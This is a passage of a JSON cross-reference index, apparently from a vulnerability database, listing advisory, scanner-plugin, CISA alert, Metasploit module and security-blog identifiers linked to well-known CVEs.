"EE2763B9-CDEA-5FAF-91CF-8B6902DD2E56", "EE4C8DE4-3366-58B0-9494-7FD5B6F9D0EF", "F085F702-F1C3-5ACB-99BE-086DA182D98B", "F14BCE6F-3415-59C7-AC9D-A5D7ABE1BB8E", "F1CA855B-967C-5A5E-9256-FDDE87702713", "F2165DE4-7724-559C-A733-DE9F244DA408", "F22160B4-2E80-5B7D-8238-95D7833F6D73", "F27B127B-57F0-5352-B92F-B6F921378CBB", "F3CF4A79-402B-56C0-8689-1AF5EBFECF3F", "F3D87CA2-44D8-583C-AF7F-85AA53FB6CAD", "F472C105-E3B1-524A-BBF5-1C436185F6EE", "F5B92B0D-E802-5254-8668-D6A4B1DB8004", "F775D2F3-FF1F-529F-B0F3-99AB6A801264", "F922DD70-E22B-5EBE-9CAE-410224E95831", "F9EF1801-C66C-572B-B67A-9A67E04D6B06", "FA6C0B5A-E89D-54A7-B603-4D8095BF66DD", "FB0D7C2A-01EB-5929-A539-96230C17B90F", "FBB9B577-00A5-5C82-AFC5-4A52422056F3", "FC661572-B96B-5B2C-B12F-E8D279E189BF", "FC802471-7CE1-5444-80E9-9DB49BA530DD", "FE544217-2BB0-5C05-B26C-D14EE378E8A5", "FFBF7B7B-FFD8-5A32-89B0-AAB175FD2AE6", "FFF6224F-273A-5CB1-9421-833769E01519", "FFF6ABA4-7461-5653-836A-79F11037A7FF"]}, {"type": "googleprojectzero", "idList": ["GOOGLEPROJECTZERO:2E85097DC4FBE492B1CB6FAE84AFE126", "GOOGLEPROJECTZERO:CA925EE6A931620550EF819815B14156"]}, {"type": "hackerone", "idList": ["H1:1174185", "H1:1519841", "H1:322935", "H1:518637", "H1:536130", "H1:538771", "H1:541858", "H1:591295", "H1:617543", "H1:632721", "H1:671749", "H1:671857", "H1:678496", "H1:680480", "H1:695005", "H1:713900", "H1:838196", "H1:913695", "H1:983548"]}, {"type": "hivepro", "idList": ["HIVEPRO:0B8823CF2C319136EC74B1EBBD7D38BE", "HIVEPRO:3D8952D1ED1ADBF8196A73CD3B7344F2", "HIVEPRO:6B816A83F1272E907442906CCA28A809", "HIVEPRO:8B19BED13F2445F04B8CD896B9AE4959", "HIVEPRO:8DA601C83DB9C139357327C06B06CB36", "HIVEPRO:A9AF072A11E6D314ED458ACFFE3BDFD3", "HIVEPRO:B3F9F66CBDECF3B8E7AADF5951D97F6A", "HIVEPRO:FD730BCAD086DD8C995242D13B38EBC8"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20190529-01-WINDOWS", "HUAWEI-SA-20200716-01-DNS", "HUAWEI-SA-20201105-01-NETLOGON"]}, {"type": "ibm", "idList": ["24B1AE073C3E8B032429754E1E35B7D96539587DDA275F7A13183F44D07B88D2", "44D4BE9C6B3A5CA2D7E393A0C6B1DE6752C9B6BDF8F6BC23CA690D4063D3152B", "7D633A7D31F7F6C981321C72372ACD7088EFC70FC50465A871D4F765F35294CC", "8190BE7075BCD3ECD99D09840619467A00B84599B985C4B2AB342389339984B1", "9A19B1A61B0A4ADFDBA9E428552BF21656703586B14AC314FFC9B663C7D9BDEB", "B2EA2FBA4D280351FEA7F9EC1921C448D44F4D9EC613590A87A15467F7D34153", "DAB88099018B311F83DAFDB9431625A326A00FF72BE126856DCECA1262D7C308", "DB866DC8DC23646847AE5E9E25C02B2DF2A195A414B2734DCAA102E637957BAF", "DDAE44367545E909F1C5E82BA6B48DEA1D51F717CEAE6CED7805AFEA883D85F1"]}, {"type": "ics", "idList": ["AA18-284A", "AA18-337A", "AA19-024A", "AA19-122A", "AA19-168A", "AA19-290A", "AA19-339A", "AA20-006A", "AA20-010A", "AA20-014A", "AA20-020A", "AA20-031A", "AA20-049A", "AA20-073A", "AA20-099A", "AA20-106A", "AA20-107A", "AA20-120A", "AA20-126A", "AA20-133A", "AA20-182A", "AA20-183A", "AA20-195A", "AA20-198A", "AA20-205A", "AA20-206A", "AA20-209A", "AA20-225A", "AA20-227A", "AA20-239A", "AA20-245A", "AA20-258A", "AA20-259A", "AA20-266A", "AA20-280A", "AA20-283A", "AA20-296A", "AA20-296B", "AA20-301A", "AA20-302A", "AA20-304A", "AA20-336A", "AA20-345A", "AA20-352A", "AA21-0000A", "AA21-008A", "AA21-042A", "AA21-048A", "AA21-055A", "AA21-062A", "AA21-076A", "AA21-077A", "AA21-110A", "AA21-116A", "AA21-131A", "AA21-148A", "AA21-200A", "AA21-200B", "AA21-201A", "AA21-209A", "AA21-229A", "AA21-243A", "AA21-259A", "AA21-287A", "AA21-291A", "AA21-321A", "AA21-336A", "AA21-356A", "AA22-011A", "AA22-040A", "AA22-047A", "AA22-054A", "AA22-055A", "AA22-057A", "AA22-074A", "AA22-076A", "AA22-083A", "AA22-103A", "AA22-108A", "AA22-110A", "AA22-117A", "AA22-131A", "AA22-137A", "AA22-138A", "AA22-138B", "AA22-152A", "AA22-158A", "AA22-174A", "AA22-181A", "AA22-187A", "AA22-216A", "AA22-223A", "AA22-228A", "AA22-249A", "AA22-249A-0", "AA22-257A", "AA22-264A", "AA22-265A", "AA22-277A", "AA22-279A", "AA22-294A", "AA22-320A", "AA22-321A", "AA22-335A", "AA23-025A", "AA23-039A", "AA23-059A", "AA23-061A", "AA23-074A", "AA23-075A", "AA23-108", "AA23-129A", "AA23-131A", "AA23-136A", "AA23-144A", "AA23-158A", "AA23-165A", "AA23-187A", "AA23-193A", "AA23-201A", "AA23-208A", "AA23-213A", "AA23-215A", "AA23-242A", "AA23-250A", "AA23-263A", "ICSA-21-077-03", "ICSMA-20-049-01"]}, {"type": "impervablog", "idList": ["IMPERVABLOG:020B268DFC760B88704D35A6F4CF30D7", "IMPERVABLOG:4124E2CCDA610C6D222319C47C8D3250", "IMPERVABLOG:4F187FDBA230373382F26BA12E00F8E7", "IMPERVABLOG:6F67E97EF55C748CBFEE482E85D4751A", "IMPERVABLOG:A1972445B3E03EDA92E53FFFBD6771BD", "IMPERVABLOG:A30E92D9B177CCFF9F5476DD34E25F51", "IMPERVABLOG:BB987E93C1A58280077D98CF497FD72D", "IMPERVABLOG:E3068E5C16504E4E7591776B5E79213F"]}, {"type": "kaspersky", "idList": ["KLA11460", "KLA11639", "KLA11647", "KLA11664", "KLA11706", "KLA11720", "KLA11863", "KLA11865", "KLA11875", "KLA11929", "KLA11931"]}, {"type": "kitploit", "idList": ["KITPLOIT:1207079539580982634", "KITPLOIT:2730308475904875028", "KITPLOIT:4019975092566820832", "KITPLOIT:4421457840699592233", "KITPLOIT:4482238198881011483", "KITPLOIT:4707889613618662864", "KITPLOIT:5052987141331551837", "KITPLOIT:5420210148456420402", "KITPLOIT:648469287269586263", "KITPLOIT:998955151150716619"]}, {"type": "krebs", "idList": ["KREBS:1A886B22AAF8ADC53874F0E126C5A96D", "KREBS:1BEFD58F5124A2E4CA40BD9C1B49B9B7", "KREBS:58D4F859AA2566B4BCE221DB78B85548", "KREBS:62E2D32C0ABD1C4B8EA91C60B425255B", "KREBS:92A33A0E1BB183F4EF513731C0304581", "KREBS:952ACEBFD55EBD076910C6B233491883", "KREBS:95DEE0244F6DE332977BB606555E5A3C", "KREBS:9D9C58DB5C5495B10D2EBDB92549B0F2", "KREBS:A8F0DD3F6E965A3A66B2CCBB003ACF62", "KREBS:C93CCA23099AC250E702848B49677D5B", "KREBS:DF8493DA16F49CE6247436830678BA8D", "KREBS:F9486A3FDB624FD485CEA4ECAFAF3CCA"]}, {"type": "mageia", "idList": ["MGASA-2020-0380"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:22A53B0983AD9ADDB8E7F3DC1E2A1440", "MALWAREBYTES:31DFC46E307127AF5C9FD13F15DF62DB", "MALWAREBYTES:3A629D0DB6CE0BFDB2462C4612ED19ED", "MALWAREBYTES:5899EF0CF34937AFA2DB4AB02D282DF6", "MALWAREBYTES:5B32671B820EEB03840B798BCEA9FDC8", "MALWAREBYTES:60B52235DCBD12E98C7DB46F859F885C", "MALWAREBYTES:6ECB9DE9A2D8D714DB50F19BAF7BF3D4", "MALWAREBYTES:78E91E28F51B0A15B6CA53FF8A9B480B", "MALWAREBYTES:80B21E934B1C43C7071F039FE9512208", "MALWAREBYTES:8B41C7471B07595F7246D3DCB8794894", "MALWAREBYTES:BAB94968DD1EC37DA6F977226977DAF5", "MALWAREBYTES:D081BF7F95E3F31C6DB8CEF9AD86BD0D", "MALWAREBYTES:D7EFF87E8AB1DBEC63A0DBE7F8DA90B8", "MALWAREBYTES:D8FE6720785E2D0A74968E661F817C57"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY-ADMIN-DCERPC-CVE_2020_1472_ZEROLOGON-", "MSF:AUXILIARY-SCANNER-HTTP-CITRIX_DIR_TRAVERSAL-", "MSF:AUXILIARY-SCANNER-RDP-CVE_2019_0708_BLUEKEEP-", "MSF:EXPLOIT-FREEBSD-HTTP-CITRIX_DIR_TRAVERSAL_RCE-", "MSF:EXPLOIT-LINUX-HTTP-CISCO_RV32X_RCE-", "MSF:EXPLOIT-LINUX-HTTP-MOBILEIRON_MDM_HESSIAN_RCE-", "MSF:EXPLOIT-MULTI-HTTP-CONFLUENCE_WIDGET_CONNECTOR-", "MSF:EXPLOIT-MULTI-HTTP-MANAGEENGINE_ADSELFSERVICE_PLUS_SAML_RCE_CVE_2022_47966-", "MSF:EXPLOIT-MULTI-HTTP-MANAGEENGINE_SERVICEDESK_PLUS_SAML_RCE_CVE_2022_47966-", "MSF:EXPLOIT-MULTI-HTTP-NOSTROMO_CODE_EXEC-", "MSF:EXPLOIT-MULTI-MISC-WEBLOGIC_DESERIALIZE_BADATTRVAL-", "MSF:EXPLOIT-WINDOWS-HTTP-EXCHANGE_ECP_VIEWSTATE-", "MSF:EXPLOIT-WINDOWS-HTTP-MANAGEENGINE_ENDPOINT_CENTRAL_SAML_RCE_CVE_2022_47966-", "MSF:EXPLOIT-WINDOWS-HTTP-TELERIK_RAU_DESERIALIZATION-", "MSF:EXPLOIT-WINDOWS-LOCAL-CVE_2020_0787_BITS_ARBITRARY_FILE_MOVE-", "MSF:EXPLOIT-WINDOWS-RDP-CVE_2019_0708_BLUEKEEP_RCE-"]}, {"type": "mmpc", "idList": ["MMPC:1AFF4881941FA1030862F773DC84A4A8", "MMPC:27EEFD67E5E7E712750B1472E15C5A0B", "MMPC:4A6B394DCAF12E05136AE087248E228C", "MMPC:9AAC6D759E6AD62F92B56B228C39C263", "MMPC:CBEDB87F4D35A5FD3EE19BAA5965FC1B", "MMPC:D3341B3E36680D5272BC91A3694352AC", "MMPC:D6D537E875C3CBD84822A868D24B31BA", "MMPC:E537BA51663A720821A67D2A4F7F7F0E"]}, {"type": "mscve", "idList": ["MS:ADV200002", "MS:CVE-2019-0708", "MS:CVE-2019-0803", "MS:CVE-2020-0601", "MS:CVE-2020-0688", "MS:CVE-2020-1040", "MS:CVE-2020-1350", "MS:CVE-2020-1472", "MS:CVE-2021-26855", "MS:CVE-2021-26857", "MS:CVE-2021-26858", "MS:CVE-2021-27065"]}, {"type": "mskb", "idList": ["KB2664258", "KB4534273", "KB4536987", "KB4536988", "KB4536989", "KB4601315", "KB4601318", "KB4601319", "KB4601345", "KB4601347", "KB4601348", "KB4601349", "KB4601357", "KB4601363", "KB4601384"]}, {"type": "msrc", "idList": ["MSRC:0299F0ADFFEC3249877020E014342A78", "MSRC:0BBBB55B6F489CA387A82715A7CF6E11", "MSRC:181F9F2B53D93B5825CF48DFEB8D11C7", "MSRC:35A18F0B9DCC4126DC5EC19296034C33", "MSRC:3C44F45306F0FE6224680D95AD131E84", "MSRC:4D3D99779455BE99499289F3B3A35F84", "MSRC:5B84BD451283462DC81D4090EFE66280", "MSRC:617BB0BF7CDA5777BFA2E81C8277D73C", "MSRC:6899566B4A4ED588B0FAFE129DB77C42", "MSRC:6A6ED6A5B652378DCBA3113B064E973B", "MSRC:6EA997A78BB548DC0178952394874CE2", "MSRC:742C7794FE62E20994070CC0C55D90C3", "MSRC:79080D1EA83C3BB4689C763E5FACBDB5", "MSRC:79DD362947FCABAB874BE67554F26FA3", "MSRC:93A361B73FFA3EEFB6825C56F25103BB", "MSRC:96F2FB0D77EED0ABDED8EBD64AEBEA09", "MSRC:9FA59725E0E2287517314198EB45ED26", "MSRC:A424E6D824FFD5BBCF610F9A5D1B0C5F", "MSRC:C264A0152D9C51F56714066CBFFAF16B", "MSRC:CC5707634DE28783ABF066B3B22F9E19", "MSRC:D7503EE6392B6B3DC42482FC0340DB67", "MSRC:E6F280AD39764DECA8E706FC572BCD8F", "MSRC:FED202907D80016917D037495F9A0820"]}, {"type": "mssecure", "idList": ["MSSECURE:1AFF4881941FA1030862F773DC84A4A8", "MSSECURE:27EEFD67E5E7E712750B1472E15C5A0B", "MSSECURE:4A6B394DCAF12E05136AE087248E228C", "MSSECURE:748E6D0B920B699D6D088D0AD4422C46", "MSSECURE:9A5D03B503C4E238EEFD4BF9E93C78A9", "MSSECURE:9AAC6D759E6AD62F92B56B228C39C263", "MSSECURE:A60AFC5A5E991E303E0397289A086789", "MSSECURE:B42B640CBAB51E35DC07B81926B5F910", "MSSECURE:CBEDB87F4D35A5FD3EE19BAA5965FC1B", "MSSECURE:D3341B3E36680D5272BC91A3694352AC", "MSSECURE:D6D537E875C3CBD84822A868D24B31BA", "MSSECURE:E0AA6CC56D602890BBD5AF46A036FE67", "MSSECURE:E3C8B97294453D962741782EC959E79C", "MSSECURE:E537BA51663A720821A67D2A4F7F7F0E"]}, {"type": "myhack58", "idList": ["MYHACK58:62201681759", "MYHACK58:62201784367", "MYHACK58:62201889920", "MYHACK58:62201993579", "MYHACK58:62201994152", "MYHACK58:62201994153", "MYHACK58:62201994154", "MYHACK58:62201994162", "MYHACK58:62201994234", "MYHACK58:62201994259", "MYHACK58:62201994388", "MYHACK58:62201994516", "MYHACK58:62201995234", "MYHACK58:62201995523", "MYHACK58:62201995674", "MYHACK58:62201995881"]}, {"type": "nessus", "idList": ["700566.PRM", "700567.PRM", "700661.PRM", "AL2_ALAS-2021-1585.NASL", "AL2_ALAS-2021-1649.NASL", "ALA_ALAS-2018-970.NASL", "ALA_ALAS-2021-1469.NASL", "ALMA_LINUX_ALSA-2021-1647.NASL", "CENTOS8_RHSA-2021-1647.NASL", "CENTOS_RHSA-2020-5439.NASL", "CISCO-SA-20190123-RV-INFO_DIRECT.NASL", "CISCO-SA-20190123-RV-INJECT.NASL", "CISCO-SA-20200205-IOSXR-CDP-RCE.NASL", "CITRIX_NETSCALER_CTX267027.NASL", "CITRIX_NETSCALER_CTX276688.NASL", "CITRIX_SDWAN_WANOP_MULTIPLE_VULNS.NASL", "CITRIX_SSL_VPN_CVE-2019-19781.NBIN", "COLDFUSION_WIN_APSB18-14.NASL", "CONFLUENCE_6_6_12.NASL", "CONFLUENCE_CVE-2019-3396.NASL", "CROWD_3_4_4.NASL", "CROWD_CVE-2019-11580.NASL", "D-LINK_ROUTER_FG-VD-19-117.NASL", "DEBIAN_DLA-1274.NASL", "DEBIAN_DLA-2463.NASL", "DEBIAN_DSA-4110.NASL", "DRAYTEK_VIGOR_UNAUTH_RCE.NASL", "EULEROS_SA-2020-2171.NASL", "EULEROS_SA-2020-2181.NASL", "EULEROS_SA-2020-2299.NASL", "EULEROS_SA-2020-2396.NASL", "EULEROS_SA-2021-1050.NASL", "EULEROS_SA-2021-1118.NASL", "EULEROS_SA-2021-1517.NASL", "EULEROS_SA-2021-1533.NASL", "EULEROS_SA-2021-1625.NASL", "EULEROS_SA-2021-1635.NASL", "EULEROS_SA-2021-2168.NASL", "EULEROS_SA-2022-2731.NASL", "EULEROS_SA-2022-2766.NASL", "EXIM_4_90_1.NASL", "F5_BIGIP_SOL30518307.NASL", "F5_BIGIP_SOL52145254.NASL", "F5_CVE-2020-5902.NASL", "FEDORA_2018-25A7BA3CB6.NASL", "FEDORA_2018-5AEC14E125.NASL", "FEDORA_2020-0BE2776ED3.NASL", "FEDORA_2020-77C15664B0.NASL", "FEDORA_2020-A1D139381A.NASL", "FORTIGATE_FG-IR-22-398.NASL", "FREEBSD_PKG_24ACE516FAD711EA8D8C005056A311D1.NASL", "FREEBSD_PKG_2BAB995F36D411EA9DAD002590ACAE31.NASL", "FREEBSD_PKG_316B3C3E0E9811E88D4197657151F8C2.NASL", "GENTOO_GLSA-201803-01.NASL", "GENTOO_GLSA-202012-24.NASL", "MANAGEENGINE_ACCESS_MANAGER_PLUS_CVE-2022-47966.NBIN", "MANAGEENGINE_DESKTOP_CENTRAL_100479.NASL", "MANAGEENGINE_DESKTOP_CENTRAL_CVE-2020-10189.NBIN", "MANAGEENGINE_SERVICEDESK_CVE-2022-47966.NBIN", "MANAGEENGINE_SERVICEDESK_MSP_13001_RCE.NASL", "MANAGEENGINE_SERVICEDESK_MSP_CVE-2022-47966.NBIN", "MANAGEENGINE_SERVICEDESK_PLUS_14004.NASL", "MICROSOFT_EDGE_CHROMIUM_79_0_309_68.NASL", "MICROSOFT_WINDOWS_HYPERV_REMOTEFX_VGPU_MULTIPLE_VULNERABILITIES.NASL", "MOBILEIRON_10_3_0_4_19.NASL", "MSRDP_CVE-2019-0708.NBIN", "MS_DNS_CVE-2020-1350.NASL", "NETLOGON_ZEROLOGON_CVE-2020-1472.NBIN", "NEWSTART_CGSL_NS-SA-2021-0024_SAMBA.NASL", "NEWSTART_CGSL_NS-SA-2021-0167_SAMBA.NASL", "NEWSTART_CGSL_NS-SA-2022-0058_SAMBA.NASL", "NOSTROMO_NHTTPD_1_9_7.NASL", "OPENSUSE-2018-170.NASL", "OPENSUSE-2020-1513.NASL", "OPENSUSE-2020-1526.NASL", "OPENSUSE-2021-677.NASL", "ORACLELINUX_ELSA-2020-5439.NASL", "ORACLELINUX_ELSA-2021-1647.NASL", "ORACLE_ACCESS_MANAGER_CPU_JUL_2021.NASL", "ORACLE_COHERENCE_CPU_JAN_2020.NASL", "ORACLE_WEBCENTER_PORTAL_CPU_OCT_2020.NBIN", "ORACLE_WEBLOGIC_SERVER_CPU_JAN_2016.NBIN", "PULSE_CONNECT_SECURE-CVE-2019-11510.NASL", "PULSE_CONNECT_SECURE-SA-44101.NASL", "PULSE_CONNECT_SECURE_PATH_TRAVERSAL.NBIN", "REDHAT-RHSA-2020-5439.NASL", "REDHAT-RHSA-2021-1647.NASL", "REDHAT-RHSA-2021-3723.NASL", "SL_20201215_SAMBA_ON_SL7_X.NASL", "SMB_NT_MS12-027.NASL", "SMB_NT_MS19_APR_4493441.NASL", "SMB_NT_MS19_APR_4493446.NASL", "SMB_NT_MS19_APR_4493451.NASL", "SMB_NT_MS19_APR_4493464.NASL", "SMB_NT_MS19_APR_4493470.NASL", "SMB_NT_MS19_APR_4493471.NASL", "SMB_NT_MS19_APR_4493472.NASL", "SMB_NT_MS19_APR_4493474.NASL", "SMB_NT_MS19_APR_4493475.NASL", "SMB_NT_MS19_APR_4493509.NASL", "SMB_NT_MS19_MAY_4499149.NASL", "SMB_NT_MS19_MAY_4499164.NASL", "SMB_NT_MS19_MAY_XP_2003.NASL", "SMB_NT_MS20_AUG_4565349.NASL", "SMB_NT_MS20_AUG_4571694.NASL", "SMB_NT_MS20_AUG_4571703.NASL", "SMB_NT_MS20_AUG_4571729.NASL", "SMB_NT_MS20_AUG_4571736.NASL", "SMB_NT_MS20_FEB_EXCHANGE.NASL", "SMB_NT_MS20_JAN_4528760.NASL", "SMB_NT_MS20_JAN_4534271.NASL", "SMB_NT_MS20_JAN_4534273.NASL", "SMB_NT_MS20_JAN_4534276.NASL", "SMB_NT_MS20_JAN_4534293.NASL", "SMB_NT_MS20_JAN_4534306.NASL", "SMB_NT_MS20_JUL_DNS_CHECK.NASL", "SMB_NT_MS21_FEB_4601347.NASL", "SUSE_SU-2020-2719-1.NASL", "SUSE_SU-2020-2720-1.NASL", "SUSE_SU-2020-2721-1.NASL", "SUSE_SU-2020-2722-1.NASL", "SUSE_SU-2020-2724-1.NASL", "SUSE_SU-2020-2730-1.NASL", "SYMANTEC_MESSAGING_GATEWAY_SYM17-006.NASL", "TELERIK_UI_FOR_ASPNET_AJAX_CVE-2019-18935.NASL", "UBUNTU_USN-3565-1.NASL", "UBUNTU_USN-4510-1.NASL", "UBUNTU_USN-4559-1.NASL", "WEBLOGIC_2015_4852.NASL", "WEB_APPLICATION_SCANNING_98638", "WEB_APPLICATION_SCANNING_98639", "WEB_APPLICATION_SCANNING_98640", "WEB_APPLICATION_SCANNING_98641"]}, {"type": "nvidia", "idList": ["NVIDIA:5044"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310105829", "OPENVAS:1361412562310108067", "OPENVAS:1361412562310108367", "OPENVAS:1361412562310108611", "OPENVAS:1361412562310108794", "OPENVAS:1361412562310140294", "OPENVAS:1361412562310704110", "OPENVAS:1361412562310806622", "OPENVAS:1361412562310813083", "OPENVAS:1361412562310814894", "OPENVAS:1361412562310815019", "OPENVAS:1361412562310815020", "OPENVAS:1361412562310815021", "OPENVAS:1361412562310815022", "OPENVAS:1361412562310815023", "OPENVAS:1361412562310815024", "OPENVAS:1361412562310815033", "OPENVAS:1361412562310815034", "OPENVAS:1361412562310815036", "OPENVAS:1361412562310815051", "OPENVAS:1361412562310815054", "OPENVAS:1361412562310815740", "OPENVAS:1361412562310815741", "OPENVAS:1361412562310815742", "OPENVAS:1361412562310815743", "OPENVAS:1361412562310815744", "OPENVAS:1361412562310815745", "OPENVAS:1361412562310815748", "OPENVAS:1361412562310815749", "OPENVAS:1361412562310815750", "OPENVAS:1361412562310817088", "OPENVAS:1361412562310817224", "OPENVAS:1361412562310817226", "OPENVAS:1361412562310817228", "OPENVAS:1361412562310817230", "OPENVAS:1361412562310817231", "OPENVAS:1361412562310817232", "OPENVAS:1361412562310843448", "OPENVAS:1361412562310851706", "OPENVAS:1361412562310874147", "OPENVAS:1361412562310874151", "OPENVAS:1361412562310891274", "OPENVAS:1361412562310902829", "OPENVAS:902829"]}, {"type": "oracle", "idList": ["ORACLE:CPUAPR2017", "ORACLE:CPUAPR2021", "ORACLE:CPUAPR2023", "ORACLE:CPUJAN2016", "ORACLE:CPUJAN2018", "ORACLE:CPUJAN2020", "ORACLE:CPUJAN2021", "ORACLE:CPUJUL2020", "ORACLE:CPUJUL2021", "ORACLE:CPUOCT2016", "ORACLE:CPUOCT2017", "ORACLE:CPUOCT2020"]}, {"type": "oraclelinux", "idList": ["ELSA-2020-5439", "ELSA-2021-1647"]}, {"type": "osv", "idList": ["OSV:DLA-2463-1", "OSV:DSA-4110-1", "OSV:GO-2022-0535"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:112176", "PACKETSTORM:143821", "PACKETSTORM:144405", "PACKETSTORM:147456", "PACKETSTORM:149926", "PACKETSTORM:151311", "PACKETSTORM:151312", "PACKETSTORM:151313", "PACKETSTORM:151374", "PACKETSTORM:152260", "PACKETSTORM:152261", "PACKETSTORM:152262", "PACKETSTORM:152268", "PACKETSTORM:152305", "PACKETSTORM:152568", "PACKETSTORM:153133", "PACKETSTORM:153627", "PACKETSTORM:154176", "PACKETSTORM:154579", "PACKETSTORM:155045", "PACKETSTORM:155802", "PACKETSTORM:155904", "PACKETSTORM:155905", "PACKETSTORM:155930", "PACKETSTORM:155947", "PACKETSTORM:155972", "PACKETSTORM:156592", "PACKETSTORM:156620", "PACKETSTORM:156730", "PACKETSTORM:156979", "PACKETSTORM:157054", "PACKETSTORM:157207", "PACKETSTORM:157795", "PACKETSTORM:158056", "PACKETSTORM:158333", "PACKETSTORM:158366", "PACKETSTORM:158581", "PACKETSTORM:159653", "PACKETSTORM:160047", "PACKETSTORM:160127", "PACKETSTORM:161065", "PACKETSTORM:161097", "PACKETSTORM:162959", "PACKETSTORM:162960", "PACKETSTORM:163810", "PACKETSTORM:170882", "PACKETSTORM:170925", "PACKETSTORM:170943"]}, {"type": "pentestpartners", "idList": ["PENTESTPARTNERS:8FD1C9A0D76A3084445136A0275847C0"]}, {"type": "prion", "idList": ["PRION:CVE-2020-0601", "PRION:CVE-2020-0688", "PRION:CVE-2020-10189", "PRION:CVE-2020-1032", "PRION:CVE-2020-1036", "PRION:CVE-2020-1040", "PRION:CVE-2020-1041", "PRION:CVE-2020-1042", "PRION:CVE-2020-1043", "PRION:CVE-2022-42475", "PRION:CVE-2022-47966"]}, {"type": "ptsecurity", "idList": ["PT-2020-01", "PT-2020-04"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:0082A77BD8EFFF48B406D107FEFD0DD3", "QUALYSBLOG:01C65083E501A6BAFB08FCDA1D561012", "QUALYSBLOG:14FD05969C722B5BF3DBBF48ED6DA9C0", "QUALYSBLOG:192411B44569225E2F2632594DC4308C", "QUALYSBLOG:1D4C1F32168D08F694C602531AEBC9D9", "QUALYSBLOG:282A52EA9B1F4C4F3F084197709217B0", "QUALYSBLOG:3B1C0CD4DA2F528B07C93411EA447658", "QUALYSBLOG:400D28FE44174674BB4561AA9416F532", "QUALYSBLOG:45B4EBB10CDE38B36A9C242F3D60C7A4", "QUALYSBLOG:563DC556FF331059CAC2F71B19B341B5", "QUALYSBLOG:5A5094DBFA525D07EBC3EBA036CDF81A", "QUALYSBLOG:6652DB89D03D8AA145C2F888B5590E3F", "QUALYSBLOG:66E92B63FC165BEAF707A9D6B2807033", "QUALYSBLOG:6AFD8E9AB405FBE460877D857273A9AF", "QUALYSBLOG:8028F138635C78F91B08AB2CF72FA154", "QUALYSBLOG:82E24C28622F0C96140EDD88C6BD8F54", "QUALYSBLOG:8DC9B53E981BBE193F6EC369D7FA85F8", "QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4", "QUALYSBLOG:9D071EBE42634FFBB58CB68A83252B41", "QUALYSBLOG:A0F20902D80081B44813D92C6DCCDAAF", "QUALYSBLOG:A28C30F71B1450A5D1A2C74AEBD22E6A", "QUALYSBLOG:A730164ABD0AA0A58D62EAFAB48628AD", "QUALYSBLOG:AE1D32AF43539C7362B2E060204A5413", "QUALYSBLOG:AF3D80BA12D4BBA1EE3BE23A5E730B6C", "QUALYSBLOG:BC22CE22A3E70823D5F0E944CBD5CE4A", "QUALYSBLOG:CAF5B766E6B0E6C1A5ADF56D442E7BB2", "QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "QUALYSBLOG:D38E3F9D341C222CBFEA0B99AD50C439", "QUALYSBLOG:DE1FEC2B9B661D42DAA0BA398DBFD24E", "QUALYSBLOG:F343178EEC11B54CFAFBD0B4D505010B", "QUALYSBLOG:FBDC4B445E6B33502BA1650A8BD4A6E1", "QUALYSBLOG:FD90A85F75806FE26BBC0970B56AFB9D"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:0C3EDBDC537092A20C850F762D5A5856", "RAPID7BLOG:24E0BE5176F6D3963E1824AD4A55019E", "RAPID7BLOG:3801C6C4728415BDC9A56A2258BD827B", "RAPID7BLOG:3A2793FB5315EE3613661543700B783B", "RAPID7BLOG:3C33F951C2627CD39145D80BA2047F1E", "RAPID7BLOG:3E54ECACB70B1C9E4DF1458D3CABE899", "RAPID7BLOG:44EA89871AFF6881B909B9FD0E07034F", "RAPID7BLOG:486F801929E1F794197FC08AE13E4CB5", "RAPID7BLOG:49C18614AD01B6865616A65F734B9F71", "RAPID7BLOG:5586742AC0F1C66F56B3583482B0960A", "RAPID7BLOG:5D8768D89A817B5475C9FEA3577FB0BC", "RAPID7BLOG:6A1F743B64899419F505BFE243BD179F", "RAPID7BLOG:7549D87CE6E6AE596B8031184231ECD1", "RAPID7BLOG:B65D62B8E1AD22C908D33D641FD0A55E", "RAPID7BLOG:C628D3D68DF3AE5A40A1F0C9DFA38860", "RAPID7BLOG:C90DF07E98E436DFBFCC5BA576D21019", "RAPID7BLOG:CA6D1E560679DBBB9F7A5EECC34A0194", "RAPID7BLOG:CBD7A5DA1DAAE9DCFD01F104F4B1B5FB", "RAPID7BLOG:D1061BEC8F38C05C82730335576C86AF", "RAPID7BLOG:E36C557104ECB6E144C21C3C499B0492", "RAPID7BLOG:E8EB68630D38C60B7DE4AF696474210D", "RAPID7BLOG:EAEC3BF3C403DB1C2765FD14F0E03A85", "RAPID7BLOG:F4F1A7CFCF2440B1B23C1904402DDAF2"]}, {"type": "redhat", "idList": ["RHSA-2020:5439", "RHSA-2021:1647", "RHSA-2021:3723"]}, {"type": "redhatcve", "idList": ["RH:CVE-2018-6789", "RH:CVE-2020-1472", "RH:CVE-2022-47966"]}, {"type": "rocky", "idList": ["RLSA-2021:1647"]}, {"type": "rosalinux", "idList": ["ROSA-SA-2021-1967"]}, {"type": "saint", "idList": ["SAINT:25A1AE710DDC7BDF13922068FD6E1AB1", "SAINT:27C5127555C4E549C099885D4DCD41D9", "SAINT:2837E3FFCA88074AEA3D7A814D67BEC2", "SAINT:364F42DDB229F6E8A0EF4BB04CE504D2", "SAINT:38F4E0E6CE11A2F3EC10321A6DF373E2", "SAINT:4A51F090FB88D7C0687C235D80825104", "SAINT:50889C53D3A04E98F4F7E31365C75978", "SAINT:691FBFDFE24704CB1E9FB73F0186260A", "SAINT:7C1EF5B76FC3A237B68C699EF952633A", "SAINT:880C926D2511DE57F08789A66AFE11F2", "SAINT:9870FA2AA27A04C7E50DC7E0A2A344D0", "SAINT:A9B0B05DC77287BBA5CCE7B14B30EB70", "SAINT:B8E045060F9ACF0F8D488745DBF66B54", "SAINT:D79A7CB8B12034409DA174D1F0EC34F3", "SAINT:EA211AC1CE6B335FAB2D22929BF61475", "SAINT:FA42FF32EDF77D4600EA8685EBDE9D45"]}, {"type": "samba", "idList": ["SAMBA:CVE-2020-1472", "SAMBA:CVE-2022-38023"]}, {"type": "schneier", "idList": ["SCHNEIER:431597F9B05B18D767EC2998B8C5DD99"]}, {"type": "securelist", "idList": ["SECURELIST:094B9FCE59977DD96C94BBF6A95D339E", 